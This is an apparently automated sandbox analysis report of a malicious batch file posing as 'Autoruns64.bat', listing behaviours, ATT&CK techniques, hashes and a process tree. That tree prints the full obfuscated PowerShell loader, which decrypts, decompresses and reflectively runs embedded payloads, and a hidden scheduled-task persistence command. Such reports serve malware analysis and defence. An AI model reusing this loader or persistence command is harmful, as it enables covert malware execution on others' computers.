a01df00146e7c4c1d921a912c1791a32531093f570575005c0d2088c4e00afae

Analysis

max time kernel
43s
max time network
41s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13/10/2024, 12:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Autoruns64.bat
Size

2.8MB
MD5

584382c704d89b38304612ee425a852f
SHA1

9d842c7c34bb0c6a00eea6f68ac278bb1ace926c
SHA256

a01df00146e7c4c1d921a912c1791a32531093f570575005c0d2088c4e00afae
SHA512

8055b34e651be041fb68f28e1731e6e09d1d400de7fd0b1eac40d2d9061057405170dfd1fbed0b4e968dd79bd185e9a41120c058880f614239792c9558bfe85c
SSDEEP

49152:0GKnII7kx63o02hXAQlJUdJwjnJnjyEUr:0F

Score

8^/10

defense_evasion execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3708	powershell.exe
4476	powershell.exe
3788	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx	svchost.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3788	powershell.exe
3788	powershell.exe
3708	powershell.exe
3708	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3492	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3788	powershell.exe
Token: SeDebugPrivilege	3708	powershell.exe
Token: SeIncreaseQuotaPrivilege	3708	powershell.exe
Token: SeSecurityPrivilege	3708	powershell.exe
Token: SeTakeOwnershipPrivilege	3708	powershell.exe
Token: SeLoadDriverPrivilege	3708	powershell.exe
Token: SeSystemProfilePrivilege	3708	powershell.exe
Token: SeSystemtimePrivilege	3708	powershell.exe
Token: SeProfSingleProcessPrivilege	3708	powershell.exe
Token: SeIncBasePriorityPrivilege	3708	powershell.exe
Token: SeCreatePagefilePrivilege	3708	powershell.exe
Token: SeBackupPrivilege	3708	powershell.exe
Token: SeRestorePrivilege	3708	powershell.exe
Token: SeShutdownPrivilege	3708	powershell.exe
Token: SeDebugPrivilege	3708	powershell.exe
Token: SeSystemEnvironmentPrivilege	3708	powershell.exe
Token: SeRemoteShutdownPrivilege	3708	powershell.exe
Token: SeUndockPrivilege	3708	powershell.exe
Token: SeManageVolumePrivilege	3708	powershell.exe
Token: 33	3708	powershell.exe
Token: 34	3708	powershell.exe
Token: 35	3708	powershell.exe
Token: 36	3708	powershell.exe
Token: SeIncreaseQuotaPrivilege	3708	powershell.exe
Token: SeSecurityPrivilege	3708	powershell.exe
Token: SeTakeOwnershipPrivilege	3708	powershell.exe
Token: SeLoadDriverPrivilege	3708	powershell.exe
Token: SeSystemProfilePrivilege	3708	powershell.exe
Token: SeSystemtimePrivilege	3708	powershell.exe
Token: SeProfSingleProcessPrivilege	3708	powershell.exe
Token: SeIncBasePriorityPrivilege	3708	powershell.exe
Token: SeCreatePagefilePrivilege	3708	powershell.exe
Token: SeBackupPrivilege	3708	powershell.exe
Token: SeRestorePrivilege	3708	powershell.exe
Token: SeShutdownPrivilege	3708	powershell.exe
Token: SeDebugPrivilege	3708	powershell.exe
Token: SeSystemEnvironmentPrivilege	3708	powershell.exe
Token: SeRemoteShutdownPrivilege	3708	powershell.exe
Token: SeUndockPrivilege	3708	powershell.exe
Token: SeManageVolumePrivilege	3708	powershell.exe
Token: 33	3708	powershell.exe
Token: 34	3708	powershell.exe
Token: 35	3708	powershell.exe
Token: 36	3708	powershell.exe
Token: SeIncreaseQuotaPrivilege	3708	powershell.exe
Token: SeSecurityPrivilege	3708	powershell.exe
Token: SeTakeOwnershipPrivilege	3708	powershell.exe
Token: SeLoadDriverPrivilege	3708	powershell.exe
Token: SeSystemProfilePrivilege	3708	powershell.exe
Token: SeSystemtimePrivilege	3708	powershell.exe
Token: SeProfSingleProcessPrivilege	3708	powershell.exe
Token: SeIncBasePriorityPrivilege	3708	powershell.exe
Token: SeCreatePagefilePrivilege	3708	powershell.exe
Token: SeBackupPrivilege	3708	powershell.exe
Token: SeRestorePrivilege	3708	powershell.exe
Token: SeShutdownPrivilege	3708	powershell.exe
Token: SeDebugPrivilege	3708	powershell.exe
Token: SeSystemEnvironmentPrivilege	3708	powershell.exe
Token: SeRemoteShutdownPrivilege	3708	powershell.exe
Token: SeUndockPrivilege	3708	powershell.exe
Token: SeManageVolumePrivilege	3708	powershell.exe
Token: 33	3708	powershell.exe
Token: 34	3708	powershell.exe
Token: 35	3708	powershell.exe

Suspicious use of FindShellTrayWindow 40 IoCs

pid	Process
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
3492	Explorer.EXE
3492	Explorer.EXE
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe

Suspicious use of SendNotifyMessage 38 IoCs

pid	Process
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
3492	Explorer.EXE
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe
2576	taskmgr.exe

Suspicious use of WriteProcessMemory 63 IoCs

description	pid	Process	procid_target
PID 3824 wrote to memory of 4344	3824	cmd.exe	87
PID 3824 wrote to memory of 4344	3824	cmd.exe	87
PID 3824 wrote to memory of 3788	3824	cmd.exe	88
PID 3824 wrote to memory of 3788	3824	cmd.exe	88
PID 3788 wrote to memory of 3708	3788	powershell.exe	90
PID 3788 wrote to memory of 3708	3788	powershell.exe	90
PID 3788 wrote to memory of 1472	3788	powershell.exe	93
PID 3788 wrote to memory of 1472	3788	powershell.exe	93
PID 1472 wrote to memory of 1416	1472	WScript.exe	94
PID 1472 wrote to memory of 1416	1472	WScript.exe	94
PID 1416 wrote to memory of 2600	1416	cmd.exe	96
PID 1416 wrote to memory of 2600	1416	cmd.exe	96
PID 1416 wrote to memory of 4476	1416	cmd.exe	97
PID 1416 wrote to memory of 4476	1416	cmd.exe	97
PID 4476 wrote to memory of 3492	4476	powershell.exe	56
PID 4476 wrote to memory of 1180	4476	powershell.exe	20
PID 4476 wrote to memory of 1372	4476	powershell.exe	23
PID 4476 wrote to memory of 976	4476	powershell.exe	12
PID 4476 wrote to memory of 1960	4476	powershell.exe	35
PID 4476 wrote to memory of 1756	4476	powershell.exe	30
PID 4476 wrote to memory of 3128	4476	powershell.exe	54
PID 4476 wrote to memory of 1548	4476	powershell.exe	27
PID 4476 wrote to memory of 1152	4476	powershell.exe	19
PID 4476 wrote to memory of 2328	4476	powershell.exe	66
PID 4476 wrote to memory of 3768	4476	powershell.exe	70
PID 4476 wrote to memory of 1920	4476	powershell.exe	34
PID 4476 wrote to memory of 1720	4476	powershell.exe	29
PID 4476 wrote to memory of 2704	4476	powershell.exe	46
PID 4476 wrote to memory of 1520	4476	powershell.exe	26
PID 4476 wrote to memory of 1912	4476	powershell.exe	33
PID 4476 wrote to memory of 2340	4476	powershell.exe	41
PID 4476 wrote to memory of 528	4476	powershell.exe	14
PID 4476 wrote to memory of 920	4476	powershell.exe	11
PID 4476 wrote to memory of 1312	4476	powershell.exe	22
PID 4476 wrote to memory of 2680	4476	powershell.exe	45
PID 4476 wrote to memory of 916	4476	powershell.exe	15
PID 4476 wrote to memory of 2488	4476	powershell.exe	44
PID 4476 wrote to memory of 2876	4476	powershell.exe	51
PID 4476 wrote to memory of 1500	4476	powershell.exe	25
PID 4476 wrote to memory of 3664	4476	powershell.exe	57
PID 4476 wrote to memory of 2480	4476	powershell.exe	43
PID 4476 wrote to memory of 1100	4476	powershell.exe	17
PID 4476 wrote to memory of 812	4476	powershell.exe	10
PID 4476 wrote to memory of 1092	4476	powershell.exe	16
PID 4476 wrote to memory of 1288	4476	powershell.exe	21
PID 4476 wrote to memory of 1668	4476	powershell.exe	28
PID 4476 wrote to memory of 1108	4476	powershell.exe	18
PID 4476 wrote to memory of 2064	4476	powershell.exe	38
PID 4476 wrote to memory of 4616	4476	powershell.exe	65
PID 4476 wrote to memory of 4992	4476	powershell.exe	72
PID 4476 wrote to memory of 4004	4476	powershell.exe	68
PID 4476 wrote to memory of 3412	4476	powershell.exe	55
PID 4476 wrote to memory of 2820	4476	powershell.exe	50
PID 4476 wrote to memory of 1824	4476	powershell.exe	32
PID 4476 wrote to memory of 2792	4476	powershell.exe	49
PID 4476 wrote to memory of 2192	4476	powershell.exe	40
PID 4476 wrote to memory of 1992	4476	powershell.exe	36
PID 4476 wrote to memory of 1400	4476	powershell.exe	74
PID 4476 wrote to memory of 2112	4476	powershell.exe	39
PID 4476 wrote to memory of 1780	4476	powershell.exe	31
PID 4476 wrote to memory of 1384	4476	powershell.exe	24
PID 3492 wrote to memory of 2576	3492	Explorer.EXE	101
PID 3492 wrote to memory of 2576	3492	Explorer.EXE	101

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
PID:812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:528

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1092

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1100

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1152

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1180

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1520

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1548

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1756

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1780

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1912

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1960

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2064

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2112

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3412

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Autoruns64.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2ZEQG0G+BjYSP/d9Z3fmCz2qBG/BXDTNnZDQOO/rA/k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KVEkCIBzeHYcZKu9+A9NfQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gaabE=New-Object System.IO.MemoryStream(,$param_var); $JINMt=New-Object System.IO.MemoryStream; $pBZVp=New-Object System.IO.Compression.GZipStream($gaabE, [IO.Compression.CompressionMode]::Decompress); $pBZVp.CopyTo($JINMt); $pBZVp.Dispose(); $gaabE.Dispose(); $JINMt.Dispose(); $JINMt.ToArray();}function execute_function($param_var,$param2_var){ $gnVIQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MHenX=$gnVIQ.EntryPoint; $MHenX.Invoke($null, $param2_var);}$wIXko = 'C:\Users\Admin\AppData\Local\Temp\Autoruns64.bat';$host.UI.RawUI.WindowTitle = $wIXko;$LSkmM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wIXko).Split([Environment]::NewLine);foreach ($kcaTq in $LSkmM) { if ($kcaTq.StartsWith('KmkUptOWyBfWLjCsREUP')) { $sErRx=$kcaTq.Substring(20); break; }}$payloads_var=[string[]]$sErRx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:4344
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3788
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_802_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_802.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3708
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_802.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:1472
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_802.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1416
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2ZEQG0G+BjYSP/d9Z3fmCz2qBG/BXDTNnZDQOO/rA/k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KVEkCIBzeHYcZKu9+A9NfQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gaabE=New-Object System.IO.MemoryStream(,$param_var); $JINMt=New-Object System.IO.MemoryStream; $pBZVp=New-Object System.IO.Compression.GZipStream($gaabE, [IO.Compression.CompressionMode]::Decompress); $pBZVp.CopyTo($JINMt); $pBZVp.Dispose(); $gaabE.Dispose(); $JINMt.Dispose(); $JINMt.ToArray();}function execute_function($param_var,$param2_var){ $gnVIQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MHenX=$gnVIQ.EntryPoint; $MHenX.Invoke($null, $param2_var);}$wIXko = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_802.bat';$host.UI.RawUI.WindowTitle = $wIXko;$LSkmM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wIXko).Split([Environment]::NewLine);foreach ($kcaTq in $LSkmM) { if ($kcaTq.StartsWith('KmkUptOWyBfWLjCsREUP')) { $sErRx=$kcaTq.Substring(20); break; }}$payloads_var=[string[]]$sErRx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:2600
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4476
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:3768

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:1400

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
005bc2ef5a9d890fb2297be6a36f01c2

SHA1
0c52adee1316c54b0bfdc510c0963196e7ebb430

SHA256
342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

SHA512
f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_quodzkcn.20q.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_802.bat

Filesize
2.8MB

MD5
584382c704d89b38304612ee425a852f

SHA1
9d842c7c34bb0c6a00eea6f68ac278bb1ace926c

SHA256
a01df00146e7c4c1d921a912c1791a32531093f570575005c0d2088c4e00afae

SHA512
8055b34e651be041fb68f28e1731e6e09d1d400de7fd0b1eac40d2d9061057405170dfd1fbed0b4e968dd79bd185e9a41120c058880f614239792c9558bfe85c

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_802.vbs

Filesize
124B

MD5
ccccab98e6940c5498c7a0498b0418f1

SHA1
5425777291b559d4de8b06d30f98dd52bbdfcbd8

SHA256
e02bbf5a19f9cf26b9a2125e4c91b317ed07c10dea5bb96169c6f6c63e3af65c

SHA512
0f9cc8210a3900cb2121edbb6f2bc778f168317e73762b0a856edc405723850ad8a929f3a757d917299f05fdb35056be6ce981df54607fccf01febdb81279b1a

Download Submit
memory/528-87-0x00007FFAE5A10000-0x00007FFAE5A20000-memory.dmp

Filesize
64KB

Download
memory/920-90-0x00007FFAE5A10000-0x00007FFAE5A20000-memory.dmp

Filesize
64KB

Download
memory/976-77-0x00007FFAE5A10000-0x00007FFAE5A20000-memory.dmp

Filesize
64KB

Download
